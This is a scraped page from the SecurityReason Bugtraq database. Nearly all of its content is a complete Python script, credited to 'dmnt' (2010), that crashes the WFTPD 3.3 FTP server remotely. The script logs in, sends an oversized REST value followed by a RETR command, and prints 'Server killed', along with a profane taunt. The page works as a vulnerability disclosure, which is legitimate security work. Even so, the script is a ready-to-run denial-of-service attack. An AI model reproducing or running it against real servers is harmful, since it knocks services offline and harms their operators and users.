|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : dmnt SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : # WFTPD 3.3 unhandled exception # # (x)dmnt 2010 # -*- coding: windows-1252 -*- import socket import sys, time def help_info(): print ("Usage: wftpdkill <host> <login> <password> <existingfle>n") def dos_it(hostname, username, passwd, exfile): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(2048) print "[+] Connected" sock.send("user %srn" %username) r=sock.recv(1024) time.sleep(3) sock.send("pass %srn" %passwd) r=sock.recv(1024) print "Send evil commands" time.sleep(3) sock.send("pasvrn") r=sock.recv(1024) time.sleep(3) sock.send("rest 999999999999999999999999999999999999999999999999999999999999999999rn") r=sock.recv(1024) time.sleep(3) sock.send("retr %srn" %exfile) time.sleep(3) sock.send("Burn, muthfcka, burn!rn") sock.close() print "Server killedrn" print ("nWFTPD 3.3 remote DoS exploit") if len(sys.argv) < 5: help_info() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] exfile=sys.argv[4] dos_it(hostname,username,passwd,exfile) sys.exit(0) Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |